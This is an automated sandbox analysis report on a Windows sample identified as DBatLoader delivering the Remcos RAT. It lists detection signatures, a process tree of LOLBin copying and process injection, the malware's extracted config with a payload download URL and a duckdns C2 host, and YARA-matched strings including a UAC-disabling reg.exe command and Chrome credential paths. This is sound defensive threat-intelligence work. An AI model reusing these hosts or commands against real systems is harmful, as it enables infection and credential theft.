Edit tour

Windows Analysis Report
1m181Ru74o.exe

Overview

General Information

Sample name:	1m181Ru74o.exe renamed because original name is a hash value
Original sample name:	050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9.exe
Analysis ID:	1562867
MD5:	06a72ba35aaff1b3ab0ea4d3e2e65451
SHA1:	656564a2afc61d10e70d4833a0a57ef046709963
SHA256:	050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Remcos RAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates a thread in another existing process (thread injection)

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Uses dynamic DNS services

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

1m181Ru74o.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\1m181Ru74o.exe" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)

cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 7860 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 7892 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 7900 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SndVol.exe (PID: 7944 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)

Ntmftfld.PIF (PID: 8176 cmdline: "C:\Users\Public\Libraries\Ntmftfld.PIF" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)

colorcpl.exe (PID: 5288 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

Ntmftfld.PIF (PID: 7464 cmdline: "C:\Users\Public\Libraries\Ntmftfld.PIF" MD5: 06A72BA35AAFF1B3AB0EA4D3E2E65451)

colorcpl.exe (PID: 4540 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc"]}

Threatname: Remcos

{"Host:Port:Password": ["craekuro.duckdns.org:1950:1"], "Assigned name": "$100 MILLION", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-YHG91Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
Process Memory Space: SndVol.exe PID: 7944	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: SndVol.exe PID: 7944	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xcbd8:$a1: Remcos restarted by watchdog! 0x1bb14:$a1: Remcos restarted by watchdog! 0xd10f:$a3: %02i:%02i:%02i:%03i 0xd6c8:$a3: %02i:%02i:%02i:%03i 0x1c04b:$a3: %02i:%02i:%02i:%03i 0x1c604:$a3: %02i:%02i:%02i:%03i 0xd331:$a4: * Remcos v 0x1c26d:$a4: * Remcos v
Process Memory Space: colorcpl.exe PID: 5288	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: colorcpl.exe PID: 5288	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x840e:$a1: Remcos restarted by watchdog! 0x2300d:$a1: Remcos restarted by watchdog! 0x8945:$a3: %02i:%02i:%02i:%03i 0x8efe:$a3: %02i:%02i:%02i:%03i 0x23544:$a3: %02i:%02i:%02i:%03i 0x23afd:$a3: %02i:%02i:%02i:%03i 0x8b67:$a4: * Remcos v 0x23766:$a4: * Remcos v
Process Memory Space: colorcpl.exe PID: 4540	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: colorcpl.exe PID: 4540	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x188e3:$a1: Remcos restarted by watchdog! 0x2738e:$a1: Remcos restarted by watchdog! 0x18e1a:$a3: %02i:%02i:%02i:%03i 0x193d3:$a3: %02i:%02i:%02i:%03i 0x278c5:$a3: %02i:%02i:%02i:%03i 0x27e7e:$a3: %02i:%02i:%02i:%03i 0x1903c:$a4: * Remcos v 0x27ae7:$a4: * Remcos v
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.SndVol.exe.48e0000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.48e0000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x68778:$a1: Remcos restarted by watchdog! 0x68cd0:$a3: %02i:%02i:%02i:%03i 0x69055:$a4: * Remcos v
9.2.SndVol.exe.48e0000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x6377c:$str_a1: C:\Windows\System32\cmd.exe 0x636f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x636f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62ba8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x633e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x627a4:$str_b2: Executing file: 0x638c0:$str_b3: GetDirectListeningPort 0x631a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x633c8:$str_b7: \update.vbs 0x627cc:$str_b9: Downloaded file: 0x627b8:$str_b10: Downloading file: 0x6285c:$str_b12: Failed to upload file: 0x63888:$str_b13: StartForward 0x638a8:$str_b14: StopForward 0x63370:$str_b15: fso.DeleteFile " 0x63304:$str_b16: On Error Resume Next 0x633a0:$str_b17: fso.DeleteFolder " 0x6284c:$str_b18: Uploaded file: 0x6280c:$str_b19: Unable to delete: 0x63338:$str_b20: while fso.FileExists(" 0x62ce1:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.48e0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x62698:$s1: \Classes\mscfile\shell\open\command 0x626f8:$s1: \Classes\mscfile\shell\open\command 0x626e0:$s2: eventvwr.exe
15.2.colorcpl.exe.7091998.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.colorcpl.exe.7091998.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
15.2.colorcpl.exe.7091998.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
15.2.colorcpl.exe.7091998.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
9.2.SndVol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
